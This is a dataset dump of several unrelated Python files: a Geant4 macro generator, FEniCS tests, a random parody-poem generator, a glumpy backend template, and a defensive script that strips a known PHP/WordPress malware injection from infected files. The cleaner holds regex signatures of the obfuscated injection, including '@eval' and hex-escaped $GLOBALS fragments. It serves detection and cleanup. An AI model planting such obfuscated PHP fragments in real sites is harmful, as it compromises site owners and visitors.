text stringlengths 957 885k |
|---|
<reponame>qihuilyu/P2T
import sys, os
from os.path import join as pjoin
import math
import numpy as np
from rotation import inv_rotbeam
# Directory containing the Geant4 macro templates, resolved relative to this module file.
TEMPLATES = pjoin(os.path.abspath(os.path.dirname(__file__)), 'templates')
def generate_beamon(stream, nparticles, nruns=1):
    """Write the entire beamOn file contents to *stream*.

    Emits one ``/run/beamOn`` command per run, each requesting the same
    number of particles, and returns the stream for chaining.
    """
    command = '/run/beamOn {:d}\n'.format(nparticles)
    for _ in range(nruns):
        stream.write(command)
    return stream
def generate_init(stream, nthreads, magfield=(0,0,1.5, 'tesla'), desc='Geant4 general initialization'):
    """Write the Geant4 initialization macro to *stream* from the init template.

    Args:
        stream: writable file-like object receiving the macro text.
        nthreads (int): number of worker threads to request.
        magfield (x, y, z, unit): magnetic field vector plus unit string.
        desc (str): description embedded in the generated macro.

    Returns:
        The stream, for chaining.
    """
    fields = {
        'description': desc,
        'nthreads': nthreads,
        'magx': magfield[0],
        'magy': magfield[1],
        'magz': magfield[2],
        'magu': magfield[3],
    }
    with open(pjoin(TEMPLATES, 'init.in.tpl'), 'r') as fd:
        template = fd.read()
    stream.write(template.format(**fields))
    return stream
def calculate_plane_rotation(angle_gantry, angle_couch, angle_coll):
    """Calculate the x' and y' unit vectors of the source plane for the given rotations.

    The source z' axis is parallel with the beam direction, so only the two
    in-plane basis vectors are returned.

    Args:
        angle_gantry (float): gantry rotation angle
        angle_couch (float): couch rotation angle
        angle_coll (float): collimator rotation angle

    Returns:
        tuple: ``(xp, yp)`` rotated basis vectors (numpy arrays).
    """
    # Rotate the nominal x axis into the beam frame.
    xp = inv_rotbeam(np.array([1,0,0]), angle_gantry, angle_couch, angle_coll)
    # NOTE(review): y' comes from the rotated z axis with a sign flip --
    # presumably to keep a right-handed in-plane basis; confirm against
    # the inv_rotbeam convention in rotation.py.
    yp = -inv_rotbeam(np.array([0,0,1]), angle_gantry, angle_couch, angle_coll)
    return xp, yp
def is_numeric(x):
    """Return True if *x* can be converted to a float, False otherwise.

    Accepts numbers and numeric strings (e.g. ``"6.0"``); returns False for
    None, non-numeric strings, and any other unconvertible value.
    """
    try:
        float(x)
        return True
    except (TypeError, ValueError):
        # Narrowed from a bare except: a bare clause would also swallow
        # KeyboardInterrupt/SystemExit and hide unrelated failures.
        return False
def generate_gps_photon(stream, source, focus, angle_gantry, angle_couch, angle_coll, beamletsize, sad, sfd, energy_mev, desc='Diverging Square field', gps_template=None):
    """Write the GPS (general particle source) photon macro to *stream* using a template.

    Args:
        stream: writable file-like object receiving the macro text
        source (x, y, z, u): source coordinates (u is the unit string)
        focus (x, y, z, u): focus coordinates (u is the unit string)
        angle_gantry (float): gantry angle
        angle_couch (float): couch angle
        angle_coll (float): collimator angle
        beamletsize (x, z, u): beamlet dimensions plus unit string
        sad (float): source-axis distance (units must match beamletsize units)
        sfd (float): src-focus-distance (units must match beamletsize units)
        energy_mev (float or None): mono-energetic beam energy in MeV; when
            None or non-numeric, a pre-tabulated 6MV spectrum template is used
        desc (str): description embedded in the generated macro
        gps_template (str or None): explicit template filename inside
            TEMPLATES; when None the template is selected from energy_mev

    Returns:
        The stream, for chaining.

    Raises:
        FileNotFoundError: if an explicitly requested template does not exist.
    """
    extra_kwargs = {}
    # try to match requested template
    if gps_template is not None:
        fullpath = pjoin(TEMPLATES, gps_template)
        if not os.path.isfile(fullpath):
            raise FileNotFoundError('GPS template "{}" doesn\'t exist'.format(fullpath))
    else:
        if energy_mev is not None and is_numeric(energy_mev):
            # Mono-energetic template takes the energy as an extra field.
            gps_template = 'gps_photon_mono.mac.tpl'
            extra_kwargs['energy'] = float(energy_mev)
        else:
            # Fall back to the fixed 6MV spectrum template (no energy field).
            gps_template = 'gps_photon_6MV.mac.tpl'
    xp, yp = calculate_plane_rotation(angle_gantry, angle_couch, angle_coll)
    # Scale the beamlet size (defined at the SAD plane) to the source-focus
    # plane by similar triangles; halved -- presumably because the GPS
    # template takes half-lengths. TODO confirm against the template files.
    adj_fsize = [0.5*sfd/sad*beamletsize[ii] for ii in range(2)]
    with open(pjoin(TEMPLATES, gps_template), 'r') as fd:
        stream.write(
            fd.read().format(
                description=desc,
                cx=source[0],
                cy=source[1],
                cz=source[2],
                cu=source[3],
                rot1x=xp[0],
                rot1y=xp[1],
                rot1z=xp[2],
                rot2x=yp[0],
                rot2y=yp[1],
                rot2z=yp[2],
                fsx=adj_fsize[0],
                fsy=adj_fsize[1],
                fsu=beamletsize[2],
                fx=focus[0],
                fy=focus[1],
                fz=focus[2],
                fu=focus[3],
                **extra_kwargs,
            )
        )
    return stream
def generate_gps_electron(stream, source, focus, angle_gantry, angle_couch, angle_coll, beamletsize, sad, sfd, energy_mev, desc='Diverging Square field', gps_template=None):
    """Write the GPS electron macro to *stream* using a template.

    Args:
        stream: writable file-like object receiving the macro text
        source (x, y, z, u): source coordinates (u is the unit string)
        focus (x, y, z, u): focus coordinates (u is the unit string)
        angle_gantry (float): gantry angle
        angle_couch (float): couch angle
        angle_coll (float): collimator angle
        beamletsize (x, z, u): beamlet dimensions plus unit string
        sad (float): source-axis distance (units must match beamletsize units)
        sfd (float): src-focus-distance (units must match beamletsize units)
        energy_mev (float): mono-energetic beam energy (units: MeV)
        desc (str): description embedded in the generated macro
        gps_template (str or None): explicit template filename inside
            TEMPLATES; defaults to the mono-energetic electron template

    Returns:
        The stream, for chaining.

    Raises:
        FileNotFoundError: if an explicitly requested template does not exist.
    """
    # Resolve the template: an explicit request must exist on disk.
    if gps_template is not None:
        fullpath = pjoin(TEMPLATES, gps_template)
        if not os.path.isfile(fullpath):
            raise FileNotFoundError('GPS template "{}" doesn\'t exist'.format(fullpath))
    else:
        gps_template = 'gps_electron_mono.mac.tpl'
    xp, yp = calculate_plane_rotation(angle_gantry, angle_couch, angle_coll)
    # Field half-size at the source-focus plane, by similar triangles.
    half_scale = 0.5 * sfd / sad
    adj_fsize = [half_scale * beamletsize[0], half_scale * beamletsize[1]]
    fields = dict(
        description=desc,
        cx=source[0], cy=source[1], cz=source[2], cu=source[3],
        rot1x=xp[0], rot1y=xp[1], rot1z=xp[2],
        rot2x=yp[0], rot2y=yp[1], rot2z=yp[2],
        fsx=adj_fsize[0], fsy=adj_fsize[1], fsu=beamletsize[2],
        fx=focus[0], fy=focus[1], fz=focus[2], fu=focus[3],
        energy=float(energy_mev),
    )
    with open(pjoin(TEMPLATES, gps_template), 'r') as fd:
        template = fd.read()
    stream.write(template.format(**fields))
    return stream
def generate_gps_proton(stream, source, focus, angle_gantry, angle_couch, angle_coll, beamletsize, sad, sfd, energy_mev, desc='Diverging Square field', gps_template=None):
    """Write the GPS proton macro to *stream* using a template.

    Args:
        stream: writable file-like object receiving the macro text
        source (x, y, z, u): source coordinates (u is the unit string)
        focus (x, y, z, u): focus coordinates (u is the unit string)
        angle_gantry (float): gantry angle
        angle_couch (float): couch angle
        angle_coll (float): collimator angle
        beamletsize (x, z, u): beamlet dimensions plus unit string
        sad (float): source-axis distance (units must match beamletsize units)
        sfd (float): src-focus-distance (units must match beamletsize units)
        energy_mev (float): mono-energetic beam energy (units: MeV)
        desc (str): description embedded in the generated macro
        gps_template (str or None): explicit template filename inside
            TEMPLATES; defaults to the mono-energetic proton template

    Returns:
        The stream, for chaining.

    Raises:
        FileNotFoundError: if an explicitly requested template does not exist.
    """
    # Resolve the template: an explicit request must exist on disk.
    if gps_template is not None:
        fullpath = pjoin(TEMPLATES, gps_template)
        if not os.path.isfile(fullpath):
            raise FileNotFoundError('GPS template "{}" doesn\'t exist'.format(fullpath))
    else:
        gps_template = 'gps_proton_mono.mac.tpl'
    xp, yp = calculate_plane_rotation(angle_gantry, angle_couch, angle_coll)
    # Field half-size at the source-focus plane, by similar triangles.
    half_scale = 0.5 * sfd / sad
    adj_fsize = [half_scale * beamletsize[0], half_scale * beamletsize[1]]
    fields = dict(
        description=desc,
        cx=source[0], cy=source[1], cz=source[2], cu=source[3],
        rot1x=xp[0], rot1y=xp[1], rot1z=xp[2],
        rot2x=yp[0], rot2y=yp[1], rot2z=yp[2],
        fsx=adj_fsize[0], fsy=adj_fsize[1], fsu=beamletsize[2],
        fx=focus[0], fy=focus[1], fz=focus[2], fu=focus[3],
        energy=float(energy_mev),
    )
    with open(pjoin(TEMPLATES, gps_template), 'r') as fd:
        template = fd.read()
    stream.write(template.format(**fields))
    return stream
|
#!/usr/bin/env python
"""
A very-specific malware search and removal program for PHP / WordPress v1.0
The MIT License (MIT)
Copyright (c) 2015 <NAME>.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import optparse
import os
import re
# Note: "verbose" default is True for CLI calls, but False for import
# Default options used when this module is imported as a library.
# Note: "verbose" default is True for CLI calls, but False for import.
DefaultConfig = {
    "verbose": False,
    "verbose_clean": False,
    "verbose_missing": False,
    "dry_run": True
}
# TODO: Handle a pattern list
# Previously-seen infection signatures, kept for reference:
#pattern = r'\<\?php \@eval'
#pattern = r'\<\?php \$GLOBALS\[\$GLOBALS\['
#pattern = r'\<\?php error\_reporting\(0\)\;'
# Signature of the specific first-line PHP injection this tool removes.
pattern = r'\<\?php if\(\!isset\(\$GLOBALS\[\"\\x61\\156\\x75\\156\\x61\"\]\)\) .* \$gpdkvqcaee\=\$msuqldfhhd\-1\; \?\>'
# Compile once at import time; the pattern is matched against many files.
prog = re.compile(pattern)
def test_regex(filename='/home/buckhead/public_html.hack/500.php'):
    """ Ad-hoc manual check of the signature against a known-infected file.

    Legacy Python 2 script (print statements); not an automated test.
    """
    if file_has_code(filename):
        print "MATCH FOUND"
    else:
        print "MATCH NOT FOUND"
def file_has_code(filename):
    """ Test if file has offending code on its first line.

    Only the first line is checked: the injection this tool targets is
    always prepended to the file.
    """
    # Use a context manager so the handle is closed promptly; the original
    # left the file open until garbage collection.
    with open(filename, mode='r') as fd:
        line = fd.readline()
    # prog.match anchors at the start of the line; None means clean.
    return prog.match(line) is not None
def remove_offending_code(haystack, repl=''):
    """ Remove offending code from haystack (str), optionally replacing it with another string. """
    # Delegates to the module-level compiled signature regex.
    return prog.sub(repl, haystack)
def replace_lines(filename, conf=DefaultConfig, repl=''):
    """ Replace first line on a file with the specified string(s).

    In dry-run mode the cleaned first line (and the following line, when
    present) is printed instead of rewriting the file.
    @see http://stackoverflow.com/a/15469189/1023107
    """
    with open(filename) as fin:
        lines = fin.readlines()
    # Only the first line carries the injected payload.
    lines[0] = remove_offending_code(lines[0], repl)
    if conf["dry_run"]:
        try:
            print lines[0]
            print lines[1]
        except IndexError:
            # Single-line file: nothing after the cleaned first line.
            pass
    else:
        # Rewrite the whole file with the cleaned first line.
        with open(filename, 'w') as fout:
            for line in lines:
                fout.write(line)
def clean_file(filename, conf=DefaultConfig):
    """ Clean file. Rewrites the file in place when the malware signature
    matches its first line; otherwise optionally reports clean/missing. """
    if os.path.exists(filename):
        if file_has_code(filename):
            if conf["verbose"]:
                print "Fixing : ", filename
            replace_lines(filename, conf)
        else:
            # File exists but does not match this signature.
            if conf["verbose_clean"]:
                print "Clean : ", filename
    else:
        if conf["verbose_missing"]:
            print "Missing: ", filename
def main(filename='', index_filename='', conf=DefaultConfig):
    """ Main. Cleans a single file, or every file listed in an index file.

    Raises:
        IOError: when neither a filename nor an index filename is given.
    """
    if conf["dry_run"]:
        print "**** INFO: DRY RUN. No changes will be applied. ****"
    if index_filename:
        # Index file: one path per line; blank lines and the "DONE"
        # sentinel are skipped.
        index = open(index_filename, mode='r')
        cnt = 0
        for filename in index:
            filename = filename.rstrip('\n')
            if len(filename) > 0 and filename != "DONE":
                clean_file(filename, conf)
                cnt = cnt + 1
                # for testing on first few files
                #if cnt > 2:
                #break
        index.close()
    elif filename:
        clean_file(filename, conf)
    else:
        raise IOError("You must specify either a filename or an index filename.")
    if conf["dry_run"]:
        print "**** INFO: DRY RUN. No changes have been applied. ****"
# CLI entry point (legacy Python 2, optparse-based).
if __name__ == '__main__':
    usage = "python %prog [options] [-f] [-s FILENAME] [-i INDEX_FILENAME] "
    parser = optparse.OptionParser(usage=usage)
    parser.add_option("-d", "--dry-run",
                      action="store_true", dest="dry_run", default=DefaultConfig["dry_run"],
                      help="Dry-run. Does not make actual changes to files (default).")
    parser.add_option("-f", "--force",
                      action="store_false", dest="dry_run",
                      help="Force run. Makes changes to files.")
    parser.add_option("-s", "--source",
                      dest="filename", metavar="FILENAME",
                      help="Source file to be cleaned.")
    parser.add_option("-i", "--index",
                      dest="index", metavar="INDEX_FILENAME",
                      help="Text file containing new-line delimited list of files to be cleaned.")
    parser.add_option("-c", "--verbose-clean",
                      action="store_true", dest="verbose_clean", default=DefaultConfig["verbose_clean"],
                      help="Warn about clean files (different offending code).")
    parser.add_option("-m", "--verbose-missing",
                      action="store_true", dest="verbose_missing", default=DefaultConfig["verbose_missing"],
                      help="Warn about missing files.")
    # Note: "verbose" default is True for CLI calls, but False for import
    parser.add_option("-v", "--verbose",
                      action="store_true", dest="verbose", default=True,
                      help="verbose output (default)")
    parser.add_option("-q", "--quiet",
                      action="store_false", dest="verbose",
                      help="minimal output")
    options, args = parser.parse_args()
    try:
        main(options.filename, options.index, {
            "verbose": options.verbose,
            "verbose_clean": options.verbose_clean,
            "verbose_missing": options.verbose_missing,
            "dry_run": options.dry_run
        })
    except IOError:
        # main() raises IOError when no file/index was specified.
        print "A very-specific malware search and removal program for PHP / WordPress v1.0"
        parser.print_help()
|
<reponame>MiroK/nEuronMI
from neuronmi.simulators.solver.embedding import EmbeddedMesh
from neuronmi.simulators.solver.transferring import SubMeshTransfer
import dolfin as df
import numpy as np
import unittest
class TestCases(unittest.TestCase):
    """Tests for transferring functions between a mesh and an embedded submesh."""

    def test_to_DG0(self):
        # Transfer a trace-space function from the full mesh onto a DG0
        # space on the embedded facet mesh, for an interior plane and for
        # the full domain boundary.
        subdomains = (df.CompiledSubDomain('near(x[0], 0.5)'), df.DomainBoundary())
        for subd in subdomains:
            mesh = df.UnitCubeMesh(4, 4, 4)
            facet_f = df.MeshFunction('size_t', mesh, 2, 0)
            subd.mark(facet_f, 1)
            submesh = EmbeddedMesh(facet_f, 1)
            transfer = SubMeshTransfer(mesh, submesh)
            V = df.FunctionSpace(mesh, 'Discontinuous Lagrange Trace', 0)
            Vsub = df.FunctionSpace(submesh, 'DG', 0)
            to_Vsub = transfer.compute_map(Vsub, V, strict=False)
            # Set degree 0 to get the quad order right
            f = df.Expression('x[0] + 2*x[1] - x[2]', degree=0)
            fV = df.interpolate(f, V)
            fsub = df.Function(Vsub)
            to_Vsub(fsub, fV)
            # The transferred function should reproduce f exactly on the submesh.
            error = df.inner(fsub - f, fsub - f)*df.dx(domain=submesh)
            error = df.sqrt(abs(df.assemble(error)))
            self.assertTrue(error < 1E-13)

    def test_from_DG0(self):
        def main(n, chi, measure, restrict):
            # Mark facets by chi and transfer a DG0 field from the embedded
            # facet mesh back to the trace space on the full mesh.
            mesh = df.UnitCubeMesh(2, n, n)
            facet_f = df.MeshFunction('size_t', mesh, 2, 0)
            chi.mark(facet_f, 1)
            submesh = EmbeddedMesh(facet_f, 1)
            transfer = SubMeshTransfer(mesh, submesh)
            V = df.FunctionSpace(mesh, 'Discontinuous Lagrange Trace', 0)
            Vsub = df.FunctionSpace(submesh, 'DG', 0)
            to_V = transfer.compute_map(V, Vsub, strict=False)
            # Set degree 0 to get the quad order right
            f = df.Expression('x[0] + 2*x[1] - x[2]', degree=0)
            fsub = df.interpolate(f, Vsub)
            fV = df.Function(V)
            to_V(fV, fsub)
            y = V.tabulate_dof_coordinates().reshape((V.dim(), -1))
            x = Vsub.tabulate_dof_coordinates().reshape((Vsub.dim(), -1))
            # Correspondence of coordinates
            self.assertTrue(np.linalg.norm(y[transfer.cache] - x) < 1E-13)
            # These are all the coordinates: dofs not in the cache must lie
            # outside the marked subdomain.
            idx = list(set(range(V.dim())) - set(transfer.cache))
            self.assertTrue(not any(chi.inside(xi, True) for xi in y[idx]))
            dS_ = df.Measure(measure, domain=mesh, subdomain_data=facet_f)
            # Strange that this is not exact
            error = df.inner(restrict(fV - f), restrict(fV - f))*dS_(1)
            error = df.sqrt(abs(df.assemble(error, form_compiler_parameters={'quadrature_degree': 0})))
            return error
        # Trick domains boundary because we want to use inside properly?
        bdry = df.CompiledSubDomain(' || '.join(['near(x[0]*(1-x[0]), 0)',
                                                 'near(x[1]*(1-x[1]), 0)',
                                                 'near(x[2]*(1-x[2]), 0)']))
        inputs = ((df.CompiledSubDomain('near(x[0], 0.5)'), 'dS', df.avg),
                  (bdry, 'ds', lambda x: x))
        for chi, measure, restrict in inputs:
            # The error should shrink monotonically under mesh refinement.
            errors = []
            for n in (2, 4, 8, 16):
                e = main(n, chi, measure, restrict)
                self.assertTrue(not errors or e < errors[-1])
                errors.append(e)

    def test_to_DG0_subdomain(self):
        # Cell-subdomain variant: DG0 on the full mesh restricted onto a
        # half-square cell submesh.
        mesh = df.UnitSquareMesh(4, 4)
        cell_f = df.MeshFunction('size_t', mesh, 2, 0)
        df.CompiledSubDomain('x[0] < 0.5 + DOLFIN_EPS').mark(cell_f, 1)
        submesh = EmbeddedMesh(cell_f, 1)
        transfer = SubMeshTransfer(mesh, submesh)
        V = df.FunctionSpace(mesh, 'DG', 0)
        Vsub = df.FunctionSpace(submesh, 'DG', 0)
        to_Vsub = transfer.compute_map(Vsub, V, strict=True)
        # Set degree 0 to get the quad order right
        f = df.Expression('x[0] + 2*x[1]', degree=0)
        fV = df.interpolate(f, V)
        fsub = df.Function(Vsub)
        to_Vsub(fsub, fV)
        error = df.inner(fsub - f, fsub - f)*df.dx(domain=submesh)
        error = df.sqrt(abs(df.assemble(error)))
        self.assertTrue(error < 1E-13)

    def test_from_DG0_subdomain(self):
        # Reverse direction of test_to_DG0_subdomain: submesh DG0 -> mesh DG0.
        mesh = df.UnitSquareMesh(4, 4)
        cell_f = df.MeshFunction('size_t', mesh, 2, 0)
        df.CompiledSubDomain('x[0] < 0.5 + DOLFIN_EPS').mark(cell_f, 1)
        submesh = EmbeddedMesh(cell_f, 1)
        transfer = SubMeshTransfer(mesh, submesh)
        V = df.FunctionSpace(mesh, 'DG', 0)
        Vsub = df.FunctionSpace(submesh, 'DG', 0)
        to_V = transfer.compute_map(V, Vsub, strict=True)
        # Set degree 0 to get the quad order right
        f = df.Expression('x[0] + 2*x[1]', degree=0)
        fsub = df.interpolate(f, Vsub)
        fV = df.Function(V)
        to_V(fV, fsub)
        # Compare on the submesh only; fV is undefined off the subdomain.
        error = df.inner(fV - f, fV - f)*df.dx(domain=submesh)
        error = df.sqrt(abs(df.assemble(error)))
        self.assertTrue(error < 1E-13)
# ---------------------------------------------------------------------------
# Run the suite when executed directly.
if __name__ == '__main__':
    unittest.main()
|
# -*- coding: utf-8 -*-
"""Final Project Poem
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1dX7e5VDsDkr_Go9GlTQbMDyOUOiBC11-
"""
import random
# Word banks: each list holds interchangeable substitutions for one slot of
# "'Twas the Night Before Christmas"; a random entry is picked per line.
day = ["year","hour","second","minute","dawn","evening"]
day2 = ["Easter","Hanukkah","Easter","Black Friday","my birthday","Mothers Day","Fathers Day","Monday","Friday"]
house = ["boathouse","firehouse"]
creature = ["demon","angel","fairy","Walmart employee"]
creature2 = ["blouse;","spouse;","a tiny, tiny, tiny mouse;"]
stockings = ["human skulls","socks","poptarts","bluetooth speakers","expired milk jugs","rotting leftover turkey from Thanksgiving"]
chimney = ["trashcan","sink","toilet","VCR","KFC deep fryer"]
care = ["hair,","auclair,","despair,","flair,"]
Santa = ["Jesus","the cute pizza delievery boy","my estranged uncle","a guy named Jeff","my annoying little cousin","the Walmart employee","my boss","Vishnu"]
there = ["scared,","impaired,","repaired,"]
children = ["Target employees", "little devils that they are","cute little bunnies"]
beds = ["shed,","boats made of lead,","sled,","very comfy beds," ]
sugarplums = ["disaster","the apocalypse","their imminent demise","the far flung future","fortune"]
heads = ["bread,","thread,","very heavy heads,"]
kerchief = ["book","druken rage","car","cozy couch","hot tub"]
cap = ["map,","cap,"]
L = ["short ","long ","eternal ","30 minute long "]
nap = ["rap,","trap,"]
lawn = ["edge of a cliff","lawn","patio","porch","balcony"]
clatter = ["loud pitter-patter,","clatter,","splatter,","big explosion made of antimatter,"]
sprang = ["leaped","vaulted","sprung forth","emerged","crawled out","rolled out"]
window = ["castle","Chipolte","Toys R Us","Walmart","kitchen"]
flash = ["bird,","discarded curd,","anxious nerd,","stampeding herd,"]
tore = ["Ripped","Forced","Used my big muscles to","Asked my dad to","I lazily went to","I reluctantly went to"]
sash = ["a naughty word.","a pot full of food that was recentlly stirred.","a book whose words were quite blurred.","a whisper that went unheard."]
moon = ["mid-day sun","setting sun","rising sun","blistering sun","twighlight moon","full moon"]
newfallen = ["fresh","17-day old"]
midday = ["a new pair of shoes","a wedding dress fit for a princess","the full moon at midnight"]
below = ["embargoed,","that gave off an unearthly glow,","that made me go 'whoa',"]
eyes = ["feet","hands","socks","hat","hamsters"]
appear = ["lear","lean back in fear","all but disappear"]
sleigh = ["horse","wooden house","boat","cake"]
reindeer = ["souvenirs","mutineers","peers"]
driver = ["grandma","grandpa","decaying mummy","Mario from Super Mario 64","Bowser","<NAME>","Yoshi"]
lively = ["unhinged","unaware","bloated","disheveled"]
quick = ["slick","non-stick","a real prick",]
in_a_moment = ["way too late that","after the fact that","instantlly"]
Nick = ["Prick","Ostpolitik"]
eagles = ["mice","rodents","black widow spiders","several rabbits tied together","a kid who ate all of his Halloween candy in one day"]
came = ["brought shame","were of great acclaim","were to blame","brought their own games","proclaimed"]
whistled = ["hollered","screeched","yodeled"]
by_name = ["mean names","weird names"]
Dasher = ["Blinko","Stinko","Potato-Masher","Prom-Queen-Disaster"]
Dancer = ["Bargin-Bin","<NAME>","<NAME>","Blues-Clues","Clifford-The-Big-Red-Reindeer"]
porch = ["the 7-11 store","the local Homedepot","my Exs house","the Misty Mountains", "Helms-Deep","Mt. Doom"]
wall = ["local mall","sprawl"]
dash_away = ["flee for your lives","fly away","get on your way with delay","get going"]
fly = ["dry","sigh","give up and cry","fall nearby","get seen by my eyes"]
an_obstacle = ["the elementary school principal","the shopping mall security guard","that highschool bully who just won't leave you alone"]
sky = ["the starry sky","the resupply","Shanghai"]
coursers = ["robbers","mailmen","entire staff of your local Walmart","flock of geese"]
flew = ["drew","knew","stewed","flew"]
toys = ["broken glass and needles","way too many beer bottles","500 copies of Halo Reach for Xbox 360"]
# Assemble the 28 poem lines, one random choice per blank.
line_1 = "Twas the " + random.choice(day) + " before " + random.choice(day2) + ", when all through the " + random.choice(house)
line_2 = "Not a " + random.choice(creature) + " was stirring, not even a " + random.choice(creature2)
line_3 = "The " + random.choice(stockings) + " were hung by the " + random.choice(chimney) + " with " + random.choice(care)
line_4 = "In hopes that " + random.choice(Santa) + " soon would be " + random.choice(there)
line_5 = "The " + random.choice(children) + " were nestled all snug in their " + random.choice(beds)
line_6 = "While visions of " + random.choice(sugarplums) + " danced in their " + random.choice(heads)
line_7 = "And mamma in her " + random.choice(kerchief) + ", and I in my " + random.choice(cap)
line_8 = "Had just settled down for a " + random.choice(L) + random.choice(nap)
line_9 = "When out on the " + random.choice(lawn) + " there arose such a " + random.choice(clatter)
line_10 = "I " + random.choice(sprang) + " from the bed to see what was the matter."
line_11 = "Away to the " + random.choice(window) + ", I flew like a " + random.choice(flash)
line_12 = random.choice(tore) + " open the shutters and threw up " + random.choice(sash)
line_13 = "The " + random.choice(moon) + " on the breast of the " + random.choice(newfallen) + " snow"
line_14 = "Gave the lustre of " + random.choice(midday) + " to objects " + random.choice(below)
line_15 = "When what to my wondering " + random.choice(eyes) + " should " + random.choice(appear) + ","
line_16 = "But a miniture " + random.choice(sleigh) + " and eight tiny " + random.choice(reindeer) + ","
line_17 = "With a little old " + random.choice(driver) + " so " + random.choice(lively) + " and " + random.choice(quick) + ","
line_18 = "I knew " + random.choice(in_a_moment) + " it must be St. " + random.choice(Nick) + "."
line_19 = "More rapid than " + random.choice(eagles) + " his coursers they " + random.choice(came) + ","
line_20 = "And he " + random.choice(whistled) + ", and shouted, and called them " + random.choice(by_name) + ";"
line_21 = "'Now " + random.choice(Dasher) + "! Now, " + random.choice(Dancer) + "! Now, Prancer And former US President Nixon!"
line_22 = "On, Comet! On, Stupid! On, Late Bloomer And Blitzen!"
line_23 = "To the top of " + random.choice(porch) + "! To the top of the " + random.choice(wall) + "!"
line_24 = "Now " + random.choice(dash_away) + " all!'"
line_25 = "As dry leaves that before the wild hurricane " + random.choice(fly) + ","
line_26 = "When they meet with " + random.choice(an_obstacle) + ", mount to " + random.choice(sky) + ","
line_27 = "So up to the house-top the " + random.choice(coursers) + " they " + random.choice(flew) + ","
line_28 = "With the sleigh full of " + random.choice(toys) + ", and St. Nicholas too."
# Print the poem; stanza-opening lines are flush left, the rest indented.
print(line_1)
print("\t" + line_2)
print("\t" + line_3)
print("\t" + line_4)
print("\t" + line_5)
print("\t" + line_6)
print("\t" + line_7)
print("\t" + line_8)
print(line_9)
print("\t" + line_10)
print("\t" + line_11)
print("\t" + line_12)
print(line_13)
print("\t" + line_14)
print("\t" + line_15)
print("\t" + line_16)
print(line_17)
print("\t" + line_18)
print("\t" + line_19)
print("\t" + line_20)
print(line_21)
print("\t" + line_22)
print("\t" + line_23)
print("\t" + line_24)
print(line_25)
print("\t" + line_26)
print("\t" + line_27)
print("\t" + line_28)
# -----------------------------------------------------------------------------
# Copyright (c) 2009-2016 <NAME>. All rights reserved.
# Distributed under the (new) BSD License.
# -----------------------------------------------------------------------------
"""
Template backend for writing a new backend.
"""
import os, sys
from glumpy import gl
from glumpy.log import log
from glumpy.app import configuration
from glumpy.app.window import window
# Backend name
__name__ = "Template"
# Backend version (if available)
__version__ = ""
# Backend availability (set below when the toolkit import succeeds)
__availability__ = False
# Whether the framework has been initialized
__initialized__ = False
# Active windows managed by this backend
__windows__ = []


# ---------------------------------------------------- convenient functions ---
# Read-only accessors over the module-level backend state.
def name(): return __name__
def version(): return __version__
def available(): return __availability__
# --------------------------------------------------------------- init/exit ---
def __init__():
    """ Mark the backend as initialized (called once by the app layer). """
    global __initialized__
    __initialized__ = True


def __exit__():
    """ Mark the backend as shut down. """
    global __initialized__
    __initialized__ = False
# ------------------------------------------------------------ availability ---
# Probe for the underlying toolkit at import time; availability and the
# key/mouse translation tables are only defined when the import succeeds.
try:
    import ToolKit # Replace with actual toolkit
    __availability__ = True
    __version__ = ""

    # Toolkit-specific key/mouse code translation tables (fill in per backend).
    __key_map__ = { }
    __mouse_map__ = { }
except ImportError:
    __availability__ = False
    __version__ = None

# -------------------------------------------------------------- capability ---
# Feature matrix advertised to the app layer; a concrete backend flips the
# entries it actually supports.
capability = {
    "Window position get/set" : False,
    "Window size get/set"     : False,
    "Multiple windows"        : False,
    "Mouse scroll events"     : False,
    "Non-decorated window"    : False,
    "Non-sizeable window"     : False,
    "Fullscreen mode"         : False,
    "Unicode processing"      : False,
    "Set GL version"          : False,
    "Set GL profile"          : False,
    "Share GL context"        : False,
}
# ------------------------------------------------------- set_configuration ---
def set_configuration(configuration):
    """ Set GL initialization here (depth buffer size, etc.) """
    # Template placeholder: concrete backends translate the requested GL
    # configuration into toolkit calls.
    pass
# ------------------------------------------------------------------ Window ---
class Window(window.Window):
    """
    Generic template for writing a new backend.

    All toolkit-dependent methods raise NotImplementedError until a concrete
    backend fills them in.
    """

    def __init__( self, width=512, height=512, title=None, visible=True, aspect=None,
                  decoration=True, fullscreen=False, config=None, context=None, color=(0,0,0,1), vsync=False):
        window.Window.__init__(self, width=width,
                               height=height,
                               title=title,
                               visible=visible,
                               aspect=aspect,
                               decoration=decoration,
                               fullscreen=fullscreen,
                               config=config,
                               context=context,
                               color=color)
        # Create the native window here

        # Register the window so windows()/process() can see it; close()
        # removes it again. (The original template never registered the
        # window, which made close() raise ValueError on the remove.)
        __windows__.append(self)

        # Each of the events below must be called at some point. This means you
        # have to connect to key and mouse events using toolkit native methods
        # and dispatch the event to glumpy event stack.
        # self.dispatch_event('on_show')
        # self.dispatch_event('on_hide')
        # self.dispatch_event('on_close')
        # self.dispatch_event('on_resize', width, height)
        # self.dispatch_event('on_mouse_release', x, y, button)
        # self.dispatch_event('on_mouse_press', x, y, button)
        # self.dispatch_event('on_mouse_motion', x, y, dx, dy)
        # self.dispatch_event('on_mouse_drag', x, y, dx, dy, button)
        # self.dispatch_event('on_mouse_scroll', x, y, xoffset, yoffset)
        # self.dispatch_event('on_key_press', symbol, modifiers)
        # self.dispatch_event('on_key_release', symbol, modifiers)
        # self.dispatch_event('on_character', u"%c" % character)

    def show(self):
        """ Make the window visible and notify listeners. """
        # -> Add toolkit specific code here to show the native window.
        #    (The original template mistakenly called glfw, which this
        #    backend never imports.)
        self.dispatch_event('on_show')

